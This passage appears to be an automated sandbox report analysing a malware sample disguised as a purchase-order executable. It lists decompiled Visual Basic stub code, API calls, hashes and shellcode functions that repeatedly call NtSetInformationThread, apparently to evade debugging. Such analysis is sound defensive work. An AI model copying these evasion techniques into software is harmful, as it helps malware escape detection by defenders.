0x0042773c
0x00427741
0x00427744
0x00427747
0x0042774c
0x0042774c
0x00427758
0x0042775d
0x00427763
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,00401576), ref: 004276C4
__vbaNew2.MSVBVM60(0040516C,00430010,?,?,?,?,00401576), ref: 004276E9
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,00401576), ref: 00427716
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403E40,000001D8,?,?,?,?,?,?,?,00401576), ref: 00427747
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,00401576), ref: 00427758

Memory Dump Source

Source File: 00000000.00000002.254091440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.254085568.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254281684.0000000000430000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254289363.0000000000432000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckChkstkFreeHresultNew2
String ID:
API String ID: 4127847336-0
Opcode ID: 51ba5618784e5c51a171198c6d5d4578b7c9cf32a82fb8a41fe3dd2d15dbb8ee
Instruction ID: 9002439c9d60e68cc0e1810e5a48f6b76f8a06de6aae8e0ad68a216ea6b24e59
Opcode Fuzzy Hash: 51ba5618784e5c51a171198c6d5d4578b7c9cf32a82fb8a41fe3dd2d15dbb8ee
Instruction Fuzzy Hash: E9213874D00218AFCB049FA5D845BEEBBB8AB08714F50412AF112B72A0D7B868419B6D

Uniqueness

Uniqueness Score: -1.00%

Function 00419FE1, Relevance: 7.6, APIs: 5, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E00419FE1(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v24;
				intOrPtr* _v28;
				signed int _v32;
				intOrPtr* _v40;
				signed int _v44;
				char* _t26;
				signed int _t29;
				intOrPtr _t40;

				_push(0x401576);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t40;
				_push(0x18);
				L00401570();
				_v12 = _t40;
				_v8 = 0x4012f0;
				if( *0x430010 != 0) {
					_v40 = 0x430010;
				} else {
					_push(0x430010);
					_push(0x40516c);
					L0040175C();
					_v40 = 0x430010;
				}
				_t26 =  &_v24;
				L00401762();
				_v28 = _t26;
				_t29 =  *((intOrPtr*)( *_v28 + 0x1d8))(_v28, _t26,  *((intOrPtr*)( *((intOrPtr*)( *_v40)) + 0x3c0))( *_v40));
				asm("fclex");
				_v32 = _t29;
				if(_v32 >= 0) {
					_v44 = _v44 & 0x00000000;
				} else {
					_push(0x1d8);
					_push(0x403e40);
					_push(_v28);
					_push(_v32);
					L00401756();
					_v44 = _t29;
				}
				L00401750();
				_push(0x41a0a6);
				return _t29;
			}

0x00419fe6
0x00419ff1
0x00419ff2
0x00419ff9
0x00419ffc
0x0041a004
0x0041a007
0x0041a015
0x0041a02f
0x0041a017
0x0041a017
0x0041a01c
0x0041a021
0x0041a026
0x0041a026
0x0041a04a
0x0041a04e
0x0041a053
0x0041a05e
0x0041a064
0x0041a066
0x0041a06d
0x0041a089
0x0041a06f
0x0041a06f
0x0041a074
0x0041a079
0x0041a07c
0x0041a07f
0x0041a084
0x0041a084
0x0041a090
0x0041a095
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,00401576), ref: 00419FFC
__vbaNew2.MSVBVM60(0040516C,00430010,?,?,?,?,00401576), ref: 0041A021
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,00401576), ref: 0041A04E
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403E40,000001D8,?,?,?,?,?,?,00401576), ref: 0041A07F
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,00401576), ref: 0041A090

Memory Dump Source

Source File: 00000000.00000002.254091440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.254085568.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254281684.0000000000430000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254289363.0000000000432000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckChkstkFreeHresultNew2
String ID:
API String ID: 4127847336-0
Opcode ID: 98c6d5ea4d1d97eb6bfdc3bd3ab4c10cd97652fd33d98dd9162bb894c1f729b4
Instruction ID: 6de53ad48245f5ea992b714260b56fdaa0ca96c2f71fd9c9b35671183e00739e
Opcode Fuzzy Hash: 98c6d5ea4d1d97eb6bfdc3bd3ab4c10cd97652fd33d98dd9162bb894c1f729b4
Instruction Fuzzy Hash: 91111D74D40208AFCB14DF91C946BEEBBB8EB08744F20406AF101B72A0D7B919419B6A

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: SBG-1100319PurchaseOrder.exe PID: 6352 Parent PID: 6224 SBG-1100319PurchaseOrder.exeCOMMON

Executed Functions

Function 00564700, Relevance: 1.7, APIs: 1, Instructions: 210libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,321C9581,?,005657DA,005623CE,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00564850

Memory Dump Source

Source File: 00000002.00000002.501532840.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 4241aae7701cec4369a26c54a55202d33632444b33ca47ef07b0ac71011d44d8
Instruction ID: c4e3efb6e1c2d60ef3f18f737cb5ca00ccd5de9b90066077b1fe6e074cb0b93e
Opcode Fuzzy Hash: 4241aae7701cec4369a26c54a55202d33632444b33ca47ef07b0ac71011d44d8
Instruction Fuzzy Hash: 2C6115550087D697C3234B3885547BA6F927FA3729F680B9DCCE3471F2D74385869A82

Uniqueness

Uniqueness Score: -1.00%

Function 00565D24, Relevance: 1.7, APIs: 1, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.501532840.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96e7d423da0a4f687034173d408db56462d63e7b938a749a4bf725f85f5ddf35
Instruction ID: 03c3bb6b2abcddf5a5f263883952472ea98cc638b1001ba18a9a4f04a54137c7
Opcode Fuzzy Hash: 96e7d423da0a4f687034173d408db56462d63e7b938a749a4bf725f85f5ddf35
Instruction Fuzzy Hash: 6A4135A015CBD02FE7099734CC89F363FA8EB97315F2941DEE182C71A3E455AC468321

Uniqueness

Uniqueness Score: -1.00%

Function 0056621C, Relevance: 1.7, APIs: 1, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.501532840.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf9ed0c003f6446558169a1af386830d6b46f138f2239f87d4d57ed76a8e6daa
Instruction ID: 6bec8fb6a0c87b77d1e2328e8fc2195f42b8744ef23330f3127b4ff423fda0fb
Opcode Fuzzy Hash: bf9ed0c003f6446558169a1af386830d6b46f138f2239f87d4d57ed76a8e6daa
Instruction Fuzzy Hash: 29410634608641DFDF264A78C46D3B13F527F62318FE84E5AC883471A6C36684CADB53

Uniqueness

Uniqueness Score: -1.00%

Function 005661B8, Relevance: 1.6, APIs: 1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.501532840.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82ffb831b8ae88e0dc69bd06916c999c118b0d6e5ddc9445596ccebcdc50943a
Instruction ID: cb923e8f45bc566579479da5851766096568eeb5b423bfc8b526b7b199c2d2ff
Opcode Fuzzy Hash: 82ffb831b8ae88e0dc69bd06916c999c118b0d6e5ddc9445596ccebcdc50943a
Instruction Fuzzy Hash: 6F411434608141DFDF354A68C4AA3F12F927F62318FE84D1BC883471A6D76684CAEB53

Uniqueness

Uniqueness Score: -1.00%

Function 00566280, Relevance: 1.6, APIs: 1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.501532840.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9255a7fbaa44901c0f5c8b23a7edb6c8bea34c939e7ea0521724a67e9f02f2ac
Instruction ID: 32bc445b538ec01f0b2bd4a3da05d13a9d9b70ff7bb5a5e5aa1a1fde8957cc4a
Opcode Fuzzy Hash: 9255a7fbaa44901c0f5c8b23a7edb6c8bea34c939e7ea0521724a67e9f02f2ac
Instruction Fuzzy Hash: 1641F434608286CFDF354A78C46D7B17FA27F62318FE84E4AC893471A6C76684C9DB42

Uniqueness

Uniqueness Score: -1.00%

Function 0056616E, Relevance: 1.6, APIs: 1, Instructions: 141nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL ref: 00566543

Memory Dump Source

Source File: 00000002.00000002.501532840.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: c68c3a42935bf3d0d52bfd7ad6b0e8135e376adb70c1ba8b3b0485499061c657
Instruction ID: c357d8236231f740371254066a38d37e92463c915df00aeedaa731c6f5a96dd4
Opcode Fuzzy Hash: c68c3a42935bf3d0d52bfd7ad6b0e8135e376adb70c1ba8b3b0485499061c657
Instruction Fuzzy Hash: 3341C134608105DFEF394A68C5AE3F02F52BF62319FE84D17C84347199D36984CAEA53

Uniqueness

Uniqueness Score: -1.00%

Function 00566174, Relevance: 1.6, APIs: 1, Instructions: 140nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL ref: 00566543

Memory Dump Source

Source File: 00000002.00000002.501532840.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: f546d31ea0e740087d50f8eb3e11fb831efd32d7393dc31b6c0c2c0c6ef2c26d
Instruction ID: 495f8a703e3255590483233d3d0388f5af4db1009a37b6757c7e54ff65781df7
Opcode Fuzzy Hash: f546d31ea0e740087d50f8eb3e11fb831efd32d7393dc31b6c0c2c0c6ef2c26d
Instruction Fuzzy Hash: CF41D034608101DFDF394A68C4AA3F12F52BF62319FE84D1BC84347199D76688CAEB53

Uniqueness

Uniqueness Score: -1.00%

Function 005661E8, Relevance: 1.6, APIs: 1, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.501532840.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc9ccbb70db240df3bb29266da33e3fb758160f457afefe920db4ed407055739
Instruction ID: ff6498ebd8d4dc5c0ee27728c8cf3be9496f9a53b9a9fcf534d046c9d9c844cd
Opcode Fuzzy Hash: dc9ccbb70db240df3bb29266da33e3fb758160f457afefe920db4ed407055739
Instruction Fuzzy Hash: 1A41DE34608241DFDF354A68C4AA3F52F92BF62318FE84D5BC84347199D36688CAEB53

Uniqueness

Uniqueness Score: -1.00%

Function 0056618C, Relevance: 1.6, APIs: 1, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.501532840.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 407808f09bf991e274d6d3ae20bb960bbd81f9628d88043111da8ba0c3c3d0bb
Instruction ID: a300384cda7cc796a408f41f47452e414653e0637c0385dfa84c5c33d1a15788
Opcode Fuzzy Hash: 407808f09bf991e274d6d3ae20bb960bbd81f9628d88043111da8ba0c3c3d0bb
Instruction Fuzzy Hash: 2141E134608241DFDF354A68C46A3F02F627F62318FE94D5BC8434716AD36684CAEB53

Uniqueness

Uniqueness Score: -1.00%

Function 005661CE, Relevance: 1.6, APIs: 1, Instructions: 125nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL ref: 00566543

Memory Dump Source

Source File: 00000002.00000002.501532840.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: 775dd90ee43e9b5a595dc85c392b075bdc805051544c774f21280b5f9b400cde
Instruction ID: a70e2dc405c6b76105c646db0826b65c7fcbb90675328d48c63a494bcf1a9a7e
Opcode Fuzzy Hash: 775dd90ee43e9b5a595dc85c392b075bdc805051544c774f21280b5f9b400cde
Instruction Fuzzy Hash: 0D41AD34608141DFDF354A68C4AA3F12F62BF62319FE94D1BC84347159D36684CAEB53

Uniqueness

Uniqueness Score: -1.00%

Function 005661FE, Relevance: 1.6, APIs: 1, Instructions: 120nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL ref: 00566543

Memory Dump Source

Source File: 00000002.00000002.501532840.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: fc72ce49d68514396759eb9a39848a30fe2981d933d71cd603b21110cd7fa368
Instruction ID: a999a5fce39df87ffb5ceb549ac8a0f0b3aa02f94d02a1ad646279ae271daad7
Opcode Fuzzy Hash: fc72ce49d68514396759eb9a39848a30fe2981d933d71cd603b21110cd7fa368
Instruction Fuzzy Hash: 2731DF34608101DFDF354A68C4AE3F12F627F62319FE94D1AC84347165D76684C9EB53

Uniqueness

Uniqueness Score: -1.00%

Function 0056648A, Relevance: 1.6, APIs: 1, Instructions: 111nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL ref: 00566543

Memory Dump Source

Source File: 00000002.00000002.501532840.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: f8d7a3f32b6fcd7f357dc007a48b1339fc4a2109ff9e2688f5cadfd4587c0f04
Instruction ID: 12c65bcde876d803917c8860bc2839d8a6bb6e2ed1774826659a43a468346e2d
Opcode Fuzzy Hash: f8d7a3f32b6fcd7f357dc007a48b1339fc4a2109ff9e2688f5cadfd4587c0f04
Instruction Fuzzy Hash: 6E41DE11608BD25BCB238B3884987916FA23D97729B9D07CC8CE25B1F2CB13C182C382

Uniqueness

Uniqueness Score: -1.00%

Function 0056624A, Relevance: 1.6, APIs: 1, Instructions: 111nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL ref: 00566543

Memory Dump Source

Source File: 00000002.00000002.501532840.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: a517e83ff9d72b22b9a3f200dde12bc3c0e9ad6b2e7049abb1ec12b08369398d
Instruction ID: 4c6e11845aca9a66343abfbb57963468d937460cb148ed458e5edddad222052e
Opcode Fuzzy Hash: a517e83ff9d72b22b9a3f200dde12bc3c0e9ad6b2e7049abb1ec12b08369398d
Instruction Fuzzy Hash: 8E31E134608141DFDF354A68C46E3F12F627F62319FE94D5AC883471A9C36684CAEB53

Uniqueness

Uniqueness Score: -1.00%

Function 00566264, Relevance: 1.6, APIs: 1, Instructions: 107nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL ref: 00566543

Memory Dump Source

Source File: 00000002.00000002.501532840.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: 7ca7c722efa27e779ee59994931695ab0d2df8a7f67dd21fa1462bf4dfdf7373
Instruction ID: f6b86287a1e8166f6caa210da69c991c7ed715ca0dec06fc14b8bff538a3dfdc
Opcode Fuzzy Hash: 7ca7c722efa27e779ee59994931695ab0d2df8a7f67dd21fa1462bf4dfdf7373
Instruction Fuzzy Hash: 3931EF34608141DFDF394A68C46E3F02F627F62319FE94E5AC843471A9C3A688C9EB53

Uniqueness

Uniqueness Score: -1.00%

Function 005662F0, Relevance: 1.6, APIs: 1, Instructions: 102nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL ref: 00566543

Memory Dump Source

Source File: 00000002.00000002.501532840.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: 7c8e882d600577151be6c403f6d6822a1e843473fd9dc9b1b94efc47b2b13ca7
Instruction ID: 7aedd94365c442453e7301d2a8ca323a9580999f0ec99df133b8f4d6d02326e4
Opcode Fuzzy Hash: 7c8e882d600577151be6c403f6d6822a1e843473fd9dc9b1b94efc47b2b13ca7
Instruction Fuzzy Hash: AE31C434608285DFDF254B68C46E7F02F917F22319FE94E9AC8434B1A6C7A684C9DB53

Uniqueness

Uniqueness Score: -1.00%

Function 00566296, Relevance: 1.6, APIs: 1, Instructions: 101nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL ref: 00566543

Memory Dump Source

Source File: 00000002.00000002.501532840.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: 55f49bacf0c38e012b45d75a2a790dfca71eded09cb979cf592c83170be1c430
Instruction ID: 7029047ec75c895890e80d4d304a3c44ecd72c1dbaaeb8128b72c0bba2711867
Opcode Fuzzy Hash: 55f49bacf0c38e012b45d75a2a790dfca71eded09cb979cf592c83170be1c430
Instruction Fuzzy Hash: AC31BF30608645DFDF394A68C45E3F02F627F21319FE94E5AC843471A5D7A684C9EB93

Uniqueness

Uniqueness Score: -1.00%

Function 005662B4, Relevance: 1.6, APIs: 1, Instructions: 96nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL ref: 00566543

Memory Dump Source

Source File: 00000002.00000002.501532840.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: 7785c6947548d7e276853caced4fc6164fb38ecd5615384761beccd2df660e46
Instruction ID: 6a75fd262b46d53daa6163285f66ea47cd023030adeaeddeb9ae3f6a6d13482f
Opcode Fuzzy Hash: 7785c6947548d7e276853caced4fc6164fb38ecd5615384761beccd2df660e46
Instruction Fuzzy Hash: 8631C130608245DFDF254A68C45E3B02F61BF21319FE94E5AC843471A9D7A684C9EB57

Uniqueness

Uniqueness Score: -1.00%

Function 005662CA, Relevance: 1.6, APIs: 1, Instructions: 94nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL ref: 00566543

Memory Dump Source

Source File: 00000002.00000002.501532840.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: 76a7a764c612f1e8748310eb2c75c6acbae3be37838f136074f2c32656b102d1
Instruction ID: 95b502f0e50f52bdbdff6301e38d1d606cd6705174d51ea021f09d4c6453775e
Opcode Fuzzy Hash: 76a7a764c612f1e8748310eb2c75c6acbae3be37838f136074f2c32656b102d1
Instruction Fuzzy Hash: 6331A030608245DFDF294A68C45E3F02F617F21329FE94E5BC843471A9C7A684C9EB53

Uniqueness

Uniqueness Score: -1.00%

Function 0056633C, Relevance: 1.6, APIs: 1, Instructions: 94nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL ref: 00566543

Memory Dump Source

Source File: 00000002.00000002.501532840.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: 024fdeb9d9b4d388333f064b761403d0b16aea4eaf1fc8e45e618788829ce317
Instruction ID: ffba7f0ab22e870708622b4e684ed0784b3a53e2269d64c81e722465c2834157
Opcode Fuzzy Hash: 024fdeb9d9b4d388333f064b761403d0b16aea4eaf1fc8e45e618788829ce317
Instruction Fuzzy Hash: 9231E530608245DFDF254A78C45E3B03F917F62329FE94E4AC893471A5C7A684CADB53

Uniqueness

Uniqueness Score: -1.00%

Function 005663E0, Relevance: 1.6, APIs: 1, Instructions: 93nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL ref: 00566543

Memory Dump Source

Source File: 00000002.00000002.501532840.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: 8f3f5511c6fd381222d774be3f99a76b2f593942c247a0900bf380820bf78a0e
Instruction ID: b2e3b053e9e9392a157d279fffe259c17a3ff64ece35d3a1fd6e5f8c7812230f
Opcode Fuzzy Hash: 8f3f5511c6fd381222d774be3f99a76b2f593942c247a0900bf380820bf78a0e
Instruction Fuzzy Hash: C331E230608286DFDF264A78C45D3B07FA17F62329FE94B86C892471A6C36684C9DB52

Uniqueness

Uniqueness Score: -1.00%

Function 00566306, Relevance: 1.6, APIs: 1, Instructions: 87nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL ref: 00566543

Memory Dump Source

Source File: 00000002.00000002.501532840.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: c8afc1da492e6e71872e53689ef65665006a8275c358dde0d78d519e11f88519
Instruction ID: caf50cdcb1f07930b625e549bfe3dea2f16e2de25e3b4cc01deae0ca2c30f54a
Opcode Fuzzy Hash: c8afc1da492e6e71872e53689ef65665006a8275c358dde0d78d519e11f88519
Instruction Fuzzy Hash: 15218E30608245DFDF294A68C49E3B02F627F61329FE94E5AC84347169C7A684C9EA53

Uniqueness

Uniqueness Score: -1.00%

Function 00566324, Relevance: 1.6, APIs: 1, Instructions: 82nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL ref: 00566543

Memory Dump Source

Source File: 00000002.00000002.501532840.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: 11d2ab8649e333107add6fcdfa4b16f9600215272481736b6f6dba479aa404e1
Instruction ID: af99e93784fd5cf8cb7db34c217ed23a5f6d4e08628f81b54b6706489c1e770c
Opcode Fuzzy Hash: 11d2ab8649e333107add6fcdfa4b16f9600215272481736b6f6dba479aa404e1
Instruction Fuzzy Hash: CA21CC30608245DFDF298A68C09E3B02F627F61329FE94E4AC84347169C7B684C9EB53

Uniqueness

Uniqueness Score: -1.00%

Function 0056635A, Relevance: 1.6, APIs: 1, Instructions: 75nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL ref: 00566543

Memory Dump Source

Source File: 00000002.00000002.501532840.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: 411a12480e9917f464a15f2de9bdf185ddb2bf4e4d5d04bcc97a992ee18d684f
Instruction ID: cade65434dc3770b47a4b9a5f0bef39c022ca0e4816b3f85bcde451b8013b56d
Opcode Fuzzy Hash: 411a12480e9917f464a15f2de9bdf185ddb2bf4e4d5d04bcc97a992ee18d684f
Instruction Fuzzy Hash: FA21F330A08245DFDF344A68C05E3B43F627F71329FE94A46C84347069C76684C9DB53

Uniqueness

Uniqueness Score: -1.00%

Function 0056636E, Relevance: 1.6, APIs: 1, Instructions: 74nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL ref: 00566543

Memory Dump Source

Source File: 00000002.00000002.501532840.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: 8a64882613528bd309e227637e5af82a99d08b6e190cf0107fec394d64fad8ee
Instruction ID: 0ebfc7802a1221f34f1712dcf8fae556ec57e65f26569f69f4ead6b4ca686a29
Opcode Fuzzy Hash: 8a64882613528bd309e227637e5af82a99d08b6e190cf0107fec394d64fad8ee
Instruction Fuzzy Hash: 2021CD30A04245DFDF394A68C49E3B03F627F61329FE98A5AC84347069C7A684C9DB53

Uniqueness

Uniqueness Score: -1.00%

Function 0056638E, Relevance: 1.6, APIs: 1, Instructions: 70nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL ref: 00566543

Memory Dump Source

Source File: 00000002.00000002.501532840.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: c9a00a3d816ac38792cf6e5e89f1afb728cbb764a9f2006af7d37bc05e9ff784
Instruction ID: e75d1dbd5ec9f7324dcc908ba8be4c6faf58bf92677861be039b90084b8bc04b
Opcode Fuzzy Hash: c9a00a3d816ac38792cf6e5e89f1afb728cbb764a9f2006af7d37bc05e9ff784
Instruction Fuzzy Hash: 2B218130A09245DFDF354A28C09E3B02FA27F71319FD9995AC88347069C7A685C9DB57

Uniqueness

Uniqueness Score: -1.00%

Function 005663AE, Relevance: 1.6, APIs: 1, Instructions: 65nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL ref: 00566543

Memory Dump Source

Source File: 00000002.00000002.501532840.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: 97300b2cb3a2753af14c2aa121fece2307cf80730ab48135df4e9e8e759d074b
Instruction ID: e769e587d312fdd4f627f3d3d7d19361ec6a5095d3cb580c8bec5abde04e51eb
Opcode Fuzzy Hash: 97300b2cb3a2753af14c2aa121fece2307cf80730ab48135df4e9e8e759d074b
Instruction Fuzzy Hash: CC116D30A15245DFDF298A28C09E3B02FA27F61319FD9895AC84347069C7A685C9DA53

Uniqueness

Uniqueness Score: -1.00%

Function 005663C8, Relevance: 1.6, APIs: 1, Instructions: 63nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL ref: 00566543

Memory Dump Source

Source File: 00000002.00000002.501532840.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: 38c3f2b012ad2a7684713905881e89b110b3011a1803d7877d713a5a6b505bc3
Instruction ID: efcb3d1b16c96a20cf7ac9d45fdc6f479aac13601efc67223812d9f022d64777
Opcode Fuzzy Hash: 38c3f2b012ad2a7684713905881e89b110b3011a1803d7877d713a5a6b505bc3
Instruction Fuzzy Hash: 99119130A15245DFDF398A28C09E3B02FA27F71319FD9895AC84347069C7B685C9DB57

Uniqueness

Uniqueness Score: -1.00%

Function 00566474, Relevance: 1.6, APIs: 1, Instructions: 53nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL ref: 00566543

Memory Dump Source

Source File: 00000002.00000002.501532840.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: 7f5b0d8beb4ebc53e1e91f0a738307b3e2fe7d3400ad41f50ea48b0787ac4c3b
Instruction ID: 2a4398fdab3b67e8ccfc6555283ea4d38edfe4c8471f0f9f15851d93aecc8341
Opcode Fuzzy Hash: 7f5b0d8beb4ebc53e1e91f0a738307b3e2fe7d3400ad41f50ea48b0787ac4c3b
Instruction Fuzzy Hash: F9118230618686CEDF254A78C0597B02F627F62329FDD4B86C8934B0B9C762C4C9D652

Uniqueness

Uniqueness Score: -1.00%

Function 0056640C, Relevance: 1.6, APIs: 1, Instructions: 53nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL ref: 00566543

Memory Dump Source

Source File: 00000002.00000002.501532840.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: 84fd4bd7686b5c4d04771b5f05d3e77361a886e70ad8c0e66044a079ffcc0ef2
Instruction ID: e2d560f81afb425f250ca2afe83e837d133b11825c1db529a895d07d774c7f8e
Opcode Fuzzy Hash: 84fd4bd7686b5c4d04771b5f05d3e77361a886e70ad8c0e66044a079ffcc0ef2
Instruction Fuzzy Hash: 17018030A15245CFDF299E28C05E3B02F627F71319FD94A4AC8434B029D766C5C9D757

Uniqueness

Uniqueness Score: -1.00%

Function 0056642A, Relevance: 1.6, APIs: 1, Instructions: 50nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL ref: 00566543

Memory Dump Source

Source File: 00000002.00000002.501532840.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: d50519225e8e1bdda75b89b1fec0f95cd57801ed6709a37a0902367886b5004a
Instruction ID: 61ebdc88f738b1853938984926d8b1018e9579e4c65897736cc9dd6a5555c088
Opcode Fuzzy Hash: d50519225e8e1bdda75b89b1fec0f95cd57801ed6709a37a0902367886b5004a
Instruction Fuzzy Hash: CF01BC30A05245CFEF299E38C09E3B02F627FB1719FD94A4AC88347029C76285C9D653

Uniqueness

Uniqueness Score: -1.00%

Function 0056645C, Relevance: 1.5, APIs: 1, Instructions: 43nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL ref: 00566543

Memory Dump Source

